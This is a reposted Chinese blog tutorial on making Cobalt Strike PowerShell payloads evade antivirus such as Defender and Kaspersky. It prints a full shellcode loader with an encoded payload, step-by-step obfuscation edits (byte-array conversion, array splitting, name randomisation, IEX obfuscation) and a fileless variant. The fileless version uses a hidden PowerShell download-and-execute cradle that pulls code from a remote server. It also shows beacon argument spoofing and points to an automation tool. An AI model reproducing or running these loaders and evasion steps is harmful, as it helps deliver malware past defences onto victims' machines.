标签：code 免杀 Object System var defender Byte Runtime Powershell

技术交流

 关注微信公众号 Z20安全团队 , 回复 加群 ，拉你入群 一起讨论技术。

直接公众号文章复制过来的，排版可能有点乱， 可以去公众号看。

 

powershell执行策略修改

1 获取 PowerShell当前执行策略

 Get-ExecutionPolicy

windows默认配置为Restricted

2 设置执行策略

 Set-ExecutionPolicy unrestricted

PowerShell通过对安全做过充分考量的，它把脚本的执行分成了几个策略。

下面是4种常用的执行策略(XXX)：

Restricted：

禁止运行任何脚本和配置文件。

AllSigned：

可以运行脚本，但要求所有脚本和配置文件由可信发布者签名，包括在本地计算机上编写的脚本。

RemoteSigned：

可以运行脚本，但要求从网络上下载的脚本和配置文件由可信发布者签名；不要求对已经运行和已在本地计算机编写的脚本进行数字签名。

Unrestricted：

可以运行未签名脚本。

powershell 混淆免杀

总述：主要是分析代码，转换编码，然后去掉关键字特征。

注意：defender杀的是下面的for那一行，直接把for中的变量$x，换成别的，以下是换成了$gg，同时要把生成的字节数组拆开，再合并，直接一个数组已经不行了。for循环那个，只要每次利用现改变量名，就可以绕过defender。

本地马免杀

1.CS生成ps1

生成payload 或者无状态stageless的都可以，但是stageless的太大了，payload太长转换的时候会卡住，故本文采用的是生成payload的方式。

Set-StrictMode -Version 2  $DoIt = @' function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) }  function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] )  $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')  return $var_type_builder.CreateType() }  [Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+EuNJY5czSyMzIyNL3NwkI0kjS3uHcMbc9qDjY6rkcxLjk1OXSnNLR01QQndLb1QFJNz2mEIjIyPIWHuq5aDMY9+aYyMjI9CHqtugy2Njo9hZXRGYQiMjI6s7Y6g7YKs7o9hZXTmYQiMjI6s7Y6g7YKs7o9hZXSSYQiMjI6s7a2uYQiMjI6s7qtCq5Xd4oMgncEkjcEkjS2shIyNJM3NLSeq/6tz2puNWcqrTa5AjqztjqBPIU8uj3NzcI0JCQg1QV0JERg0SEhAREREVGg1NUBINRUpXQExOTQ1ATE4jwi3l+0Po7OXaJ05aGZj3Wg5Z+j031+ZsWpFVQarTa6grYqsro9p8XSRL05aBddz2S8swIyNLZ9MWw9z2qtOoK6roygDc3Nyk2XyoZDug2yJWGqDkP6gcpP2q3ahfBysS6pLc0Id0dHRgpNlxdHCiydwjIyNxS9cjre/c9nh8eR7cIyMjXyTK/N3c3Kr0ouQjIyMj3MQxF3Vb')  for ($gg = 0; $gg -lt $var_code.Count; $gg++) { $var_code[$gg] = $var_code[$gg] -bxor 35 }  $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))) $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)  $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void]))) $var_runme.Invoke([IntPtr]::Zero) '@  If ([IntPtr]::size -eq 8) { start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job } else { IEX $DoIt }

2.寻找查杀特征

fuzz之后发现把“FromBase64String”删掉就不杀了，那就换掉“FromBase64String”

alert：

bypass：

可以发现是base64解密函数被标记为特征了，然后仔细看源码可以发现马也是将base64加密的payload去强制转换成byte数组。

那我们直接给他转换成byte数组

$string = ''$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('cs生成的shellcode')$s |foreach{ $string = $string + $_.ToString()+','}# 或者$string 短的话直接查看即可$string > 1.txt

最后为了方便写了个脚本实现自动化，贴入cs 的payload的就可以，可以结果会输出到当前目录下的result.txt中。

脚本文末自取

3. 把[Byte[]]$var_code替换掉

生成byte数组后，将对应位置换掉

 [Byte[]]$var_code = [Byte[]](xx,xx,xx,xx)  [Byte[]]$acode = [Byte[]](这里放刚刚转码后的FromBase65String)

其他地方不变。

此时最主要的一部分修改完了。

4.改一些关键字，数组分片

到第三步可以一部分免杀，为了进一步免杀，我们去混淆关键字。

把函数名和变量前缀var_ 随机化，还有最后的IEX改了一下。

对比截图-源文件(已经做了第三步的免杀了)

对比截图-第四步修改关键词之后的文件

可以直接把第三步替换的那一行替换掉这个代码中对应行。

数组分片

注意：defender杀的是下面的for那一行，直接把for中的变量$x，换成别的，以下是换成了$gg，同时要把生成的字节数组拆开，再合并，可以进行变量随机化拆分，加上异或混淆，直接一个数组已经不行了。实测隔个几个小时defender就有杀了，可能会传到云上查杀，改成别的变量名就没事了，所以后面写了个自动化工具。

Set-StrictMode -Version 2  $DoIt = @' function func_b { Param ($amodule, $aprocedure) $aunsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.Uns'+'afeN'+'ativeMethods') $agpa = $aunsafe_native_methods.GetMethod('GetP'+'rocAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $agpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($aunsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($amodule)))), $aprocedure)) }  function func_a { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $aparameters, [Parameter(Position = 1)] [Type] $areturn_type = [Void] )  $atype_b = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Reflect'+'edDel'+'egate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDeleg'+'ateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $atype_b.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $aparameters).SetImplementationFlags('Runtime, Managed') $atype_b.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $areturn_type, $aparameters).SetImplementationFlags('Runtime, Managed')  return $atype_b.CreateType() }  [Byte[]]$a1 = [Byte[]](转码后的byte数组片段) [Byte[]]$a2 = [Byte[]](转码后的byte数组片段) [Byte[]]$a3 = [Byte[]](转码后的byte数组片段) [Byte[]]$a4 = [Byte[]](转码后的byte数组片段) [Byte[]]$a5 = [Byte[]](转码后的byte数组片段) [Byte[]]$acode = $a1+$a2+$a3+$a4+$a5  for ($gg = 0; $gg -lt $acode.Count; $gg++) { $acode[$gg] = $acode[$gg] -bxor 35 }  $ava = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_b kernel32.dll VirtualAlloc), (func_a @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))) $abuffer = $ava.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $abuffer, $acode.length)  $arunme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($abuffer, (func_a @([IntPtr]) ([Void]))) $arunme.Invoke([IntPtr]::Zero) '@  If ([IntPtr]::size -eq 8) { start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job } else { i`ex $DoIt }

5.执行

Bypass执行策略绕过

 powershell -ExecutionPolicy bypass -File .\payload.ps1

执行命令，卡巴斯基会拦截，argue污染以下就行了。

 beacon> argue cmd.exe asdsdadsadsasadasd beacon> argue #查看污染的参数

无落地powershell免杀

总述：有了上面的思路我们来修改一下powershell一句话的木马，对其进行分析然后免杀。

原理：cs生成txt-shellcode代码，放到服务器web目录，然后目标执行powershell命令请求下载并执行。对于内容就是换一种编码来混淆，同时可以将编码部分分成几个部分然后再拼接，对于关键命令，可以使用Replace替换的方法。对于访问shellcode文件并执行的命令，可以采用混淆分割合并和Replace替换的方法绕过。

1.生成无落地执行powershell文件

2.访问http://xxx.xx.xxx.xx:80/a这个连接看看文件内容，并保存下来

通过分析可以看到代码实际组成是：

 $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("shellcode代码"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

3.使用方法1中的步骤2，把base64编码方式去掉，然后换成byte数组。

 $string = '' $s = [Byte[]]$var_code = [System.Convert]::FromBase64String('cs生成的shellcode') $s |foreach { $string = $string + $_.ToString()+','} # 或者$string 短的话直接查看即可 $string > c:\1.txt 。

同样可以用上面的步骤2中脚本实现自动化

脚本文末自取

4.将生成的编码分成两块或者多块再组合

两块不够可以分成多块。

[Byte[]]$var_c1 = [Byte[]](31,139,8,0,0,0,0,0,0,0,173,87,109,111,162,218,22,254,92,127,5,31,154,168,169,181,40,214,234,220,76,114,20,65,80,160,10,190,247,52,205,6,182,136,34,32,108,4,60,51,255,253,44,80,123,58,119,58,247,78,114,175,9,113,179,89,175,207,126,214,98,161,97,114,175,145,192,54,136,236,153,152,186,159,225,32,180,61,151,170,23,10,183,61,79,36,212,87,234,143,98,97,29,185,6,201,182,179,197,155,133,201,155,31,120,198,27,50,205,0,135,33,245,87,225,102,132,2,180,167,74,183,71,20,188,237,61,51,114,112,133,202,111,50,187,110,247,28,92,199,128,115,15,33,42,160,68,249)[Byte[]]$var_c2 = [Byte[]](199,96,206,103,88,42,138,174,140,247,128,223,249,30,104,122,187,134,50,195,87,233,75,105,165,87,239,217,125,198,101,214,65,97,88,161,70,17,212,185,81,161,52,140,28,108,86,168,142,27,218,151,71,157,136,120,249,178,248,79,184,114,228,16,219,64,33,185,154,123,45,127,2,233,197,53,235,185,80,49,145,1,189,155,171,100,3,217,135,72,62,122,114,114,79,229,11,250,65,228,238,241,255,241,0,126,112,250,223,161,205,192,203,103,186,119,232,242,128,62,199,171,40,254,81,40,136,107,234,195,126,104,159,224,139,5,31,168,86,206,189,144,160,128,220,111,61,29,62,111,242,247,117,233,22,149,41,145,91,80,183,136,250,78,221,67,122,157,144,169,195,55,78,96,69,217,203,155,58,127,178,125,163,98,100,159,21,191,81,42,54,48,140,220,247,3,79,7,150,98,152,193,50,211,185,145,76,24,246,254,6,195,245,1,82,3,14,0,0)$var_code=$var_c1+$var_c2$s=New-Object IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

5.另存到服务器的其他txt文件中并访问执行

 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:4545/text.txt'))"

此时www.virustotal.com还有几个被查出，主要是命令关键词没有被替换，使用混淆的方法解决。

6.混淆命令关键词并执行

 [Byte[]]$var_c1 = [Byte[]](31,42,160,68,249) [Byte[]]$var_c2 = [Byte[]](199,96,82,3,14,0,0) $var_code=$var_c1+$var_c2  $s=New-Object IO.MemoryStream(,$var_code);$a1='IEX (New-Object IO.Strea123'.Replace('123','mRe');$a2='ader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()';IEX($A1+$a2)

混淆-自动化

为了实现实战中快速应用，将免杀过程进行了自动化，并进行随机化处理，异或混淆，每次生成的payload都不相同，极大的提高渗透实战中的效率。

测试截图：

工具放到了星球，感兴趣的可以加入Z2O安全团队知识星球获取。

获取base64Tobyte.ps1：

https://github.com/komomon/Powershell_bypassAV

总结

一些思路

在powershell的免杀上，函数变量名需要一些混淆才能很好绕过，同样存在一个问题，如果每次执行的随机串长度固定，那么也存在被杀的可能性，所以随机化很重要。

可以再转化一下函数或代码顺序，加入一些无用载荷，比如一张图片拼接到payload中，提取有用部分，类似分片再拼接，这样效果会更好。

文章的想法是想让大家了解其中原理，形成自己的自定义免杀思路。

最后

感兴趣的小伙伴可以关注公众号回复“加群”，添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。

标签：code,免杀,Object,System,var,defender,Byte,Runtime,Powershell
来源： https://blog.csdn.net/st3pby/article/details/123037587

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。